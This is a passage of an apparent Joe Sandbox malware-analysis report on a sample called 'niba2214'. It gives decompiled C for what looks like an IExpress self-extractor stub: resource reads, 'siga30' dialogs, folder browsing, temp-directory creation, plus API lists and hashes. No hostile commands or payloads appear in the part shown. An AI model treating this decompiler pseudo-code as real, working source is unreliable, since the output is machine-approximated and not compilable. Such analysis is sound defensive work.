					SetWindowTextA(_t64, "siga30");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0x1259a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0x12591e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E012544B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0x12591e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0x12591e5 - 3;
						if(_t49 - 0x12591e5 < 3) {
							goto L32;
						}
						_t24 =  *0x12591e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0x12591e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E0125658A(0x12591e4, 0x104, 0x1251140);
								_t27 = E012558C8(0x12591e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0x12591e4 - 0x5c;
									if( *0x12591e4 != 0x5c) {
										L30:
										_t30 = E0125597D(0x12591e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0x12591e5 - 0x5c;
									if( *0x12591e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E012544B9(_t64, 0x54a, 0x12591e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x12591e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x12591e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x12591e4 - 0x5c;
						if( *0x12591e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x1259124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x1259a3c, 0x3e8, 0x1258598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E01254224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x12587a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E012544B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

0x0125321b
0x0125321e
0x01253221
0x0125343c
0x0125343e
0x0125343f
0x01253445
0x01253447
0x00000000
0x01253447
0x01253229
0x0125322a
0x0125322f
0x012533ec
0x012533f7
0x01253410
0x01253416
0x0125341d
0x0125342d
0x0125342d
0x01253438
0x00000000
0x01253438
0x01253237
0x01253243
0x01253243
0x01253246
0x012532ee
0x012532f4
0x012532f6
0x012533d4
0x012533d6
0x012533db
0x012533dc
0x012533de
0x012533df
0x01253370
0x01253372
0x00000000
0x01253372
0x012532fc
0x01253301
0x01253301
0x01253303
0x01253304
0x01253304
0x0125330a
0x0125330d
0x00000000
0x00000000
0x01253313
0x01253318
0x0125331a
0x01253331
0x01253332
0x0125333a
0x0125333d
0x0125337c
0x01253388
0x0125338f
0x01253394
0x01253396
0x012533a4
0x012533ab
0x012533b6
0x012533be
0x012533c3
0x012533c5
0x01253435
0x01253437
0x01253437
0x00000000
0x01253437
0x012533c7
0x012533c9
0x012533cc
0x00000000
0x012533cc
0x012533ad
0x012533b4
0x00000000
0x00000000
0x00000000
0x012533b4
0x01253398
0x01253399
0x0125339b
0x0125339c
0x0125339d
0x00000000
0x0125339d
0x0125334c
0x01253351
0x01253354
0x00000000
0x00000000
0x0125335c
0x01253362
0x01253364
0x00000000
0x00000000
0x01253366
0x01253367
0x01253369
0x0125336a
0x0125336b
0x00000000
0x0125336b
0x0125331c
0x01253323
0x00000000
0x00000000
0x01253329
0x0125332b
0x00000000
0x00000000
0x00000000
0x0125332b
0x0125324c
0x0125324c
0x0125324f
0x012532c8
0x012532ce
0x00000000
0x012532ce
0x01253251
0x01253256
0x00000000
0x00000000
0x01253271
0x01253277
0x01253279
0x01253298
0x0125329d
0x0125329f
0x00000000
0x00000000
0x012532b0
0x012532b6
0x012532b8
0x00000000
0x00000000
0x012532be
0x01253280
0x01253289
0x0125328e
0x00000000
0x0125328e
0x0125327b
0x00000000
0x0125327b
0x00000000

APIs

LoadStringA.USER32(000003E8,01258598,00000200), ref: 01253271
GetDesktopWindow.USER32 ref: 012533E2
SetWindowTextA.USER32(?,siga30), ref: 012533F7
SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 01253410
GetDlgItem.USER32(?,00000836), ref: 01253426
EnableWindow.USER32(00000000), ref: 0125342D
EndDialog.USER32(?,00000000), ref: 0125343F

Strings

siga30, xrefs: 012533F1
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 012532E2, 012532E7, 01253331, 01253344, 0125335B, 0125336A

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$siga30
API String ID: 2418873061-654590263
Opcode ID: 0fe86d342e230997f42071464b7dea4903f79482a1a7a0ecd4bfc58ff7f1c529
Instruction ID: 21a7f9914ed5e2adaaee75e052b7d46ad3fe1c9d56a0d0026f330777d4601123
Opcode Fuzzy Hash: 0fe86d342e230997f42071464b7dea4903f79482a1a7a0ecd4bfc58ff7f1c529
Instruction Fuzzy Hash: 7D51E630370352B6EBB29A396CCEB7B3D58FB457D4F009128FF45961C5DAB4844193A0

Uniqueness

Uniqueness Score: -1.00%

Function 01252CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E01252CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0x1258004; // 0x958f311c
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0x1259a3c = __ecx;
				memset(0x1259140, 0, 0x8fc);
				memset(0x1258a20, 0, 0x32c);
				memset(0x12588c0, 0, 0x104);
				 *0x12593ec = 1;
				_t20 = E0125468F("TITLE", 0x1259154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0x125858c = _t27;
					SetEvent(_t27);
					_t64 = 0x1259a34;
					if(E0125468F("EXTRACTOPT", 0x1259a34, 4) != 0) {
						if(( *0x1259a34 & 0x000000c0) == 0) {
							L12:
							 *0x1259120 =  *0x1259120 & _t65;
							if(E01255C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0x1258a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0x1258184 != 0) {
										__imp__#17();
									}
									if( *0x1258a24 == 0) {
										_t57 = _t65;
										if(E012536EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0x1259a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0x1259a34 & 0x00000100) == 0 || ( *0x1258a38 & 0x00000001) != 0 || E012518A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E01256517(_t57, 0x7d6, _t34, E012519E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E01252390(0x1258a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E012544B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E0125468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0x1258588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0x1259a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E012544B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E012544B9(0, 0x54b, "siga30", 0, 0x10, 0);
										L11:
										CloseHandle( *0x1258588);
										 *0x1259124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E012544B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0x1259124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E01256CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}

0x01252cb5
0x01252cbc
0x01252cc7
0x01252cc9
0x01252cd1
0x01252cd3
0x01252cd9
0x01252ce9
0x01252cf9
0x01252d0e
0x01252d15
0x01252d1c
0x01252ef3
0x00000000
0x01252d2d
0x01252d34
0x01252d3b
0x01252d40
0x01252d48
0x01252d59
0x01252d84
0x01252e1f
0x01252e1f
0x01252e2e
0x01252e41
0x01252e5a
0x01252e62
0x01252e6c
0x01252e6c
0x01252e75
0x01252e77
0x01252e77
0x01252e84
0x01252e8b
0x01252e94
0x00000000
0x01252e96
0x01252e96
0x01252e9e
0x01252ea2
0x01252eba
0x00000000
0x01252ece
0x01252ede
0x01252eed
0x00000000
0x00000000
0x00000000
0x00000000
0x01252eed
0x01252eef
0x01252eef
0x01252eef
0x01252eef
0x01252ea2
0x01252e86
0x01252e88
0x01252e88
0x01252e43
0x01252e48
0x00000000
0x01252e48
0x01252e30
0x01252e30
0x01252ef8
0x01252f01
0x00000000
0x01252f01
0x01252d8a
0x01252d8f
0x01252da1
0x00000000
0x01252da3
0x01252dae
0x01252db4
0x01252dbb
0x00000000
0x01252dca
0x01252dd3
0x01252df5
0x01252e02
0x00000000
0x00000000
0x00000000
0x00000000
0x01252dd5
0x01252dde
0x01252de3
0x01252e04
0x01252e0a
0x01252e10
0x00000000
0x01252e10
0x01252dd3
0x01252dbb
0x01252da1
0x01252d5b
0x01252d5b
0x01252d5d
0x01252d69
0x01252d6e
0x01252f06
0x01252f06
0x01252f06
0x01252d59
0x01252f18

APIs

memset.MSVCRT ref: 01252CD9
memset.MSVCRT ref: 01252CE9
memset.MSVCRT ref: 01252CF9

Part of subcall function 0125468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 012546A0
Part of subcall function 0125468F: SizeofResource.KERNEL32(00000000,00000000,?,01252D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 012546A9
Part of subcall function 0125468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 012546C3
Part of subcall function 0125468F: LoadResource.KERNEL32(00000000,00000000,?,01252D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 012546CC
Part of subcall function 0125468F: LockResource.KERNEL32(00000000,?,01252D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 012546D3
Part of subcall function 0125468F: memcpy_s.MSVCRT ref: 012546E5
Part of subcall function 0125468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 012546EF

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 01252D34
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 01252D40
CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 01252DAE
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 01252DBD
CloseHandle.KERNEL32(siga30,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 01252E0A

Part of subcall function 012544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01254518
Part of subcall function 012544B9: MessageBoxA.USER32(?,?,siga30,00010010), ref: 01254554

Strings

TITLE, xrefs: 01252D09
INSTANCECHECK, xrefs: 01252D95
siga30, xrefs: 01252D04, 01252DD9, 01252DF0
VERCHECK, xrefs: 01252E54
EXTRACTOPT, xrefs: 01252D4D

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$siga30
API String ID: 1002816675-2759441779
Opcode ID: 01c71d02aa25b69ee6b8aa7cde5dd2b3d86ed6fb52134355223b6abcc580dcca
Instruction ID: 61ef6a504cf786104fb4664e20d4442309a9c3832f857086159d9d337a1b46b4
Opcode Fuzzy Hash: 01c71d02aa25b69ee6b8aa7cde5dd2b3d86ed6fb52134355223b6abcc580dcca
Instruction Fuzzy Hash: AF51E870370302EBFBF4A635ACCEB7B3A98E755754F004029AF42D61C8DAB49881DB21

Uniqueness

Uniqueness Score: -1.00%

Function 012534F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E012534F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0x12591d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0x1258584 = _t35;
					E012543D0(_t35, GetDesktopWindow());
					__eflags =  *0x1258184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "siga30");
					_t17 = CreateThread(0, 0, E01254FE0, 0, 0, 0x1258798);
					 *0x125879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E012544B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0x125858c);
					_t38 =  *0x1258584; // 0x0
					_t25 = E012544B9(_t38, 0x4b2, 0x1251140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0x12591d8 = 1;
						SetEvent( *0x125858c);
						_t39 =  *0x125879c; // 0x0
						E01253680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0x125858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0x125879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}

0x012534fb
0x012534fe
0x01253665
0x01253666
0x01253666
0x01253668
0x0125366e
0x0125366e
0x01253671
0x01253671
0x01253677
0x00000000
0x01253677
0x01253504
0x01253506
0x01253507
0x0125350c
0x0125365b
0x0125365f
0x00000000
0x00000000
0x00000000
0x01253661
0x01253512
0x01253515
0x012535be
0x012535c1
0x012535d1
0x012535d8
0x012535de
0x012535f8
0x01253617
0x01253617
0x01253623
0x01253637
0x0125363d
0x01253642
0x01253644
0x00000000
0x01253646
0x01253652
0x01253657
0x01253658
0x00000000
0x01253658
0x01253644
0x0125351b
0x0125351d
0x0125354f
0x01253553
0x00000000
0x00000000
0x0125355f
0x01253565
0x0125357c
0x01253581
0x01253584
0x0125359b
0x012535a1
0x012535a7
0x012535ad
0x012535b3
0x012535b8
0x00000000
0x012535b8
0x01253586
0x01253588
0x00000000
0x00000000
0x01253590
0x00000000
0x01253590
0x01253524
0x01253535
0x01253541
0x00000000
0x01253549
0x00000000

APIs

TerminateThread.KERNEL32(00000000), ref: 01253535
EndDialog.USER32(?,?), ref: 01253541
ResetEvent.KERNEL32 ref: 0125355F
SetEvent.KERNEL32(01251140,00000000,00000020,00000004), ref: 01253590
GetDesktopWindow.USER32 ref: 012535C7
GetDlgItem.USER32(?,0000083B), ref: 012535F1
SendMessageA.USER32(00000000), ref: 012535F8
GetDlgItem.USER32(?,0000083B), ref: 01253610
SendMessageA.USER32(00000000), ref: 01253617
SetWindowTextA.USER32(?,siga30), ref: 01253623
CreateThread.KERNEL32 ref: 01253637
EndDialog.USER32(?,00000000), ref: 01253671

Strings

siga30, xrefs: 0125361D

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
String ID: siga30
API String ID: 2406144884-2499866817
Opcode ID: 3b2f841825059ec4894e3916c0b233c8a3e054dcabda01487ecaed64dc95ec18
Instruction ID: 77d4de75275fa04d5bec97d3f2a4d3ad916da455834dc954dfef455555718b83
Opcode Fuzzy Hash: 3b2f841825059ec4894e3916c0b233c8a3e054dcabda01487ecaed64dc95ec18
Instruction Fuzzy Hash: 05319535260311BFD7B09F2ABCCEE2A3E64F789BD5F10951DFB0296298C6B58400CB64

Uniqueness

Uniqueness Score: -1.00%

Function 01254224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E01254224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E012544B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0x12588c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0x12587a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0x1258598;
					_v36 = 1;
					_v32 = E01254200;
					_v28 = 0x12588c0;
					 *0x125a288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0x125a288(_t32, 0x12588c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0x12588c0 != 0) {
							E01251680(0x12587a0, 0x104, 0x12588c0);
						}
						 *0x125a288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0x12587a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0x12588c0);
					_t61 = 0x12588c0;
					_t4 =  &(_t61[1]); // 0x12588c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x12588c0; // 0x24b1181
					_t44 = CharPrevA(0x12588c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x12588c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}

0x01254234
0x0125423c
0x01254240
0x012543b2
0x012543b7
0x012543c0
0x00000000
0x012543c5
0x0125424c
0x01254252
0x01254257
0x012543a4
0x012543a5
0x012543ab
0x00000000
0x012543ab
0x01254263
0x01254269
0x0125426e
0x00000000
0x00000000
0x0125427a
0x01254280
0x01254285
0x00000000
0x00000000
0x0125428d
0x01254293
0x012542e6
0x012542e9
0x012542ef
0x012542f4
0x012542f7
0x01254300
0x01254307
0x0125430e
0x01254315
0x0125431c
0x01254322
0x01254326
0x0125432d
0x0125432d
0x0125432f
0x01254334
0x01254343
0x01254349
0x0125434d
0x01254354
0x01254354
0x0125435d
0x0125436e
0x0125436e
0x0125437d
0x01254383
0x01254387
0x0125438e
0x0125438e
0x01254387
0x01254391
0x01254399
0x00000000
0x01254295
0x0125429f
0x012542a5
0x012542aa
0x012542aa
0x012542ad
0x012542ad
0x012542af
0x012542b0
0x012542b6
0x012542c2
0x012542c8
0x012542ce
0x012542e4
0x012542e4
0x00000000
0x012542ce

APIs

LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 01254236
GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0125424C
GetProcAddress.KERNEL32(00000000,000000C3), ref: 01254263
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0125427A
GetTempPathA.KERNEL32(00000104,012588C0,?,00000001), ref: 0125429F
CharPrevA.USER32(012588C0,024B1181,?,00000001), ref: 012542C2
CharPrevA.USER32(012588C0,00000000,?,00000001), ref: 012542D6
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 01254391
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 012543A5

Strings

SHGetPathFromIDList, xrefs: 01254274
SHELL32.DLL, xrefs: 0125422F
SHBrowseForFolder, xrefs: 01254246

Memory Dump Source

Source File: 00000002.00000002.308648516.0000000001251000.00000020.00000001.01000000.00000005.sdmp, Offset: 01250000, based on PE: true

Associated: 00000002.00000002.308642983.0000000001250000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308656619.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.308664488.000000000125C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1250000_niba2214.jbxd

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: 8f32f2eb43fc6767ae8a5f3b2a2372c6e6831013e775a7b5742ce072bc03ab8b
Instruction ID: 1aa42492678054b90432767113d05f67ba3521293194f3e7dfd9b18b2120699f
Opcode Fuzzy Hash: 8f32f2eb43fc6767ae8a5f3b2a2372c6e6831013e775a7b5742ce072bc03ab8b
Instruction Fuzzy Hash: B0411774A20355AFE761AF66F8CDA7EBFB4EB44384F144159EF01A7245D7B48840CB60

Uniqueness

Uniqueness Score: -1.00%

Function 012544B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160
memorywindowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E012544B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0x1258004; // 0x958f311c
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0x1258a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0x1259a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E01251680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E0125171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E0125171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E0125681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E012567C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
